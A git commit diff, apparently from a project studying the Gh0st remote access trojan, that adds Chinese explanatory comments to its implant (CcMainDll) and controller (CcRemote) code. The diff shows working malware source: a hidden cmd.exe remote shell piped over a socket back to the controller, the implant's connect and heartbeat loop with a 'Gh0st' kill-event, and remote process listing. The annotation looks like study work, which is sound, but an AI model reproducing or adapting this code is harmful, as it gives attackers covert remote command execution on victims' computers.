增加了框架xmind流程图，方便理解

2025-06-10 06:19:50 +00:00 · 2020-05-28 18:37:25 +08:00 · 2020-05-28 18:37:25 +08:00 · 2349891948
commit 2349891948
parent 4bd0451420
8 changed files with 40 additions and 21 deletions
--- a/CcMainDll/.vs/CcMainDll/v15/.suo
+++ b/CcMainDll/.vs/CcMainDll/v15/.suo
--- a/CcMainDll/CcMainDll/common/ShellManager.cpp
+++ b/CcMainDll/CcMainDll/common/ShellManager.cpp
@ -10,7 +10,7 @@

 CShellManager::CShellManager(CClientSocket *pClient):CManager(pClient)
 {
-    SECURITY_ATTRIBUTES  sa = {0};  
+    SECURITY_ATTRIBUTES  sa = {0};	//安全描述符
 	STARTUPINFO          si = {0};
 	PROCESS_INFORMATION  pi = {0}; 
 	char  strShellPath[MAX_PATH] = {0};
@ -23,14 +23,14 @@ CShellManager::CShellManager(CClientSocket *pClient):CManager(pClient)
    sa.lpSecurityDescriptor = NULL; 
    sa.bInheritHandle = TRUE;

-	
+	//创建管道，管道用于获取cmd的数据信息
    if(!CreatePipe(&m_hReadPipeHandle, &m_hWritePipeShell, &sa, 0))
 	{
 		if(m_hReadPipeHandle != NULL)	CloseHandle(m_hReadPipeHandle);
 		if(m_hWritePipeShell != NULL)	CloseHandle(m_hWritePipeShell);
 		return;
    }
-
+	//创建管道，管道用于获取cmd的数据信息
    if(!CreatePipe(&m_hReadPipeShell, &m_hWritePipeHandle, &sa, 0)) 
 	{
 		if(m_hWritePipeHandle != NULL)	CloseHandle(m_hWritePipeHandle);
@ -45,12 +45,13 @@ CShellManager::CShellManager(CClientSocket *pClient):CManager(pClient)
 	si.cb = sizeof(STARTUPINFO);
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
-    si.hStdInput  = m_hReadPipeShell;
+    si.hStdInput  = m_hReadPipeShell;//将管道赋值
    si.hStdOutput = si.hStdError = m_hWritePipeShell; 

 	GetSystemDirectory(strShellPath, MAX_PATH);
 	strcat(strShellPath,"\\cmd.exe");

+	//创建CMD进程，指定管道
 	if (!CreateProcess(strShellPath, NULL, NULL, NULL, TRUE, 
 		NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)) 
 	{
@ -63,10 +64,15 @@ CShellManager::CShellManager(CClientSocket *pClient):CManager(pClient)
 	m_hProcessHandle = pi.hProcess;
 	m_hThreadHandle	= pi.hThread;

+	//标志，代表 shell功能
 	BYTE	bToken = TOKEN_SHELL_START;
+	//通知准备就绪
 	Send((LPBYTE)&bToken, 1);
 	WaitForDialogOpen();
+
+	//创建读取管道数据的线程
 	m_hThreadRead = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadPipeThread, (LPVOID)this, 0, NULL);
+	//创建一个等待线程 等待管道被关闭，终端结束操作
 	m_hThreadMonitor = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorThread, (LPVOID)this, 0, NULL);
 }

@ -102,14 +108,18 @@ void CShellManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 {
 	if (nSize == 1 && lpBuffer[0] == COMMAND_NEXT)
 	{
+		//接受消息设置信号打开，然后上面的WaitForDialogOpen();执行后续操作
 		NotifyDialogIsOpen();
 		return;
 	}
 	
 	unsigned long	ByteWrite;
+	//写入管道数据
 	WriteFile(m_hWritePipeHandle, lpBuffer, nSize, &ByteWrite, NULL);
 }

+
+//读取CMD的输出数据线程函数
 DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lparam)
 {
 	unsigned long   BytesRead = 0;
@ -119,14 +129,18 @@ DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lparam)
 	while (1)
 	{
 		Sleep(100);
+
+		//判断是否与数据以及数据大小
 		while (PeekNamedPipe(pThis->m_hReadPipeHandle, ReadBuff, sizeof(ReadBuff), &BytesRead, &TotalBytesAvail, NULL)) 
 		{
+			//没有跳出循环
 			if (BytesRead <= 0)
 				break;
 			memset(ReadBuff, 0, sizeof(ReadBuff));
 			LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, TotalBytesAvail);
+			//读取管道数据
 			ReadFile(pThis->m_hReadPipeHandle, lpBuffer, TotalBytesAvail, &BytesRead, NULL);
-			// 发送数据
+			// 发送数据 ---->OnReceive会接受数据
 			pThis->Send(lpBuffer, BytesRead);
 			LocalFree(lpBuffer);
 		}
@ -134,6 +148,8 @@ DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lparam)
 	return 0;
 }

+
+//等待结束，清理线程关闭链接
 DWORD WINAPI CShellManager::MonitorThread(LPVOID lparam)
 {
 	CShellManager *pThis = (CShellManager *)lparam;
@ -141,6 +157,8 @@ DWORD WINAPI CShellManager::MonitorThread(LPVOID lparam)
 	hThread[0] = pThis->m_hProcessHandle;
 	hThread[1] = pThis->m_hThreadRead;
 	WaitForMultipleObjects(2, hThread, FALSE, INFINITE);
+
+	//关闭上面的CMD循环读取数据的线程
 	TerminateThread(pThis->m_hThreadRead, 0);
 	TerminateProcess(pThis->m_hProcessHandle, 1);
 	pThis->m_pClient->Disconnect();
--- a/CcMainDll/CcMainDll/dllmain.cpp
+++ b/CcMainDll/CcMainDll/dllmain.cpp
@ -12,9 +12,9 @@ DWORD g_dwServiceType;
 enum
 {
 	NOT_CONNECT, //  还没有连接
-	GETLOGINFO_ERROR,
-	CONNECT_ERROR,
-	HEARTBEATTIMEOUT_ERROR
+	GETLOGINFO_ERROR,//获取信息失败
+	CONNECT_ERROR,//链接失败
+	HEARTBEATTIMEOUT_ERROR //心跳超时链接失败
 };

 DWORD WINAPI main(char *lpServiceName);
@ -53,9 +53,9 @@ DWORD WINAPI main(char *lpServiceName)
 		wsprintf(strKillEvent, "Global\\Gh0st %d", GetTickCount()); // 随机事件名

 		hInstallMutex = CreateMutex(NULL, true, g_strHost);
-		//ReConfigService(strServiceName);   //--lang--
+		//ReConfigService(strServiceName); 
 		// 删除安装文件
-	//	DeleteInstallFile(lpServiceName);     //--lang--
+	//	DeleteInstallFile(lpServiceName);  
 	}
 	// 告诉操作系统:如果没有找到CD/floppy disc,不要弹窗口吓人
 	SetErrorMode(SEM_FAILCRITICALERRORS);
@ -115,6 +115,8 @@ DWORD WINAPI main(char *lpServiceName)
 		sendLoginInfo(strServiceName, &socketClient, GetTickCount() - dwTickCount);
 		//---注意这里连接成功后声明了一个CKernelManager 到CKernelManager类查看一下
 		CKernelManager	manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort);
+		//socketClient中的主回调函数设置位这CKernelManager类中的OnReceive 
+		//（每个功能类都有OnReceive函数来处理接受的数据他们都继承自父类CManager）
 		socketClient.setManagerCallBack(&manager);

 		//////////////////////////////////////////////////////////////////////////
@ -123,14 +125,14 @@ DWORD WINAPI main(char *lpServiceName)
 		{
 			Sleep(1000);
 		}
-		// 10秒后还没有收到控制端发来的激活命令，说明对方不是控制端，重新连接
+		// 10秒后还没有收到控制端发来的激活命令，说明对方不是控制端，重新连接，获取是否有效标志
 		if (!manager.IsActived())
 			continue;

 		//////////////////////////////////////////////////////////////////////////

 		DWORD	dwIOCPEvent;
-		dwTickCount = GetTickCount();
+		dwTickCount = GetTickCount();//获取时间戳

 		do
 		{
--- a/CcRemote/.vs/CcRemote/v15/.suo
+++ b/CcRemote/.vs/CcRemote/v15/.suo
--- a/CcRemote/CcRemote/CSystemDlg.cpp
+++ b/CcRemote/CcRemote/CSystemDlg.cpp
@ -158,14 +158,14 @@ void CSystemDlg::ShowProcessList(void)
 	DWORD	dwOffset = 0;
 	CString str;
 	m_list_process.DeleteAllItems();
-	//遍历发送来的每一个字符别忘了他的数据结构啊 Id+进程名+0+完整名+0
+	//遍历发送来的每一个字符 数据结构 Id+进程名+0+完整名+0
 	int i;
 	for (i = 0; dwOffset < m_pContext->m_DeCompressionBuffer.GetBufferLen() - 1; i++)
 	{
 		LPDWORD	lpPID = LPDWORD(lpBuffer + dwOffset);        //这里得到进程ID
-		strExeFile = lpBuffer + dwOffset + sizeof(DWORD);      //进程名就是ID之后的啦
-		strProcessName = strExeFile + lstrlen(strExeFile) + 1;  //完整名就是进程名之后的啦
-		//他的数据结构的构建很巧妙
+		strExeFile = lpBuffer + dwOffset + sizeof(DWORD);      //进程名就是ID之后的
+		strProcessName = strExeFile + lstrlen(strExeFile) + 1;  //完整名就是进程名之后的
+		//数据结构构建巧妙

 		m_list_process.InsertItem(i, strExeFile);       //将得到的数据加入到列表当中
 		str.Format("%5u", *lpPID);
--- a/CcRemote/CcRemote/include/IOCPServer.cpp
+++ b/CcRemote/CcRemote/include/IOCPServer.cpp
@ -43,7 +43,6 @@ CRITICAL_SECTION CIOCPServer::m_cs;
 // 
 ////////////////////////////////////////////////////////////////////////////////

-//lang2.1_4
 CIOCPServer::CIOCPServer()     //简单分析CIOCPServer类 套接字数据处理的类
 {
 	TRACE("CIOCPServer=%p\n",this);	
--- a/CcRemote/CcRemote/include/IOCPServer.h
+++ b/CcRemote/CcRemote/include/IOCPServer.h
@ -23,10 +23,10 @@


 ////////////////////////////////////////////////////////////////////
-#define	NC_CLIENT_CONNECT		0x0001
-#define	NC_CLIENT_DISCONNECT	0x0002
-#define	NC_TRANSMIT				0x0003
-#define	NC_RECEIVE				0x0004
+#define	NC_CLIENT_CONNECT		0x0001 //客户端链接
+#define	NC_CLIENT_DISCONNECT	0x0002 //客户端断开链接
+#define	NC_TRANSMIT				0x0003 //传输
+#define	NC_RECEIVE				0x0004 //接受
 #define NC_RECEIVE_COMPLETE		0x0005 // ÍêÕû½ÓÊÕ

 class CLock
--- a/ghostAnalyze.emmx
+++ b/ghostAnalyze.emmx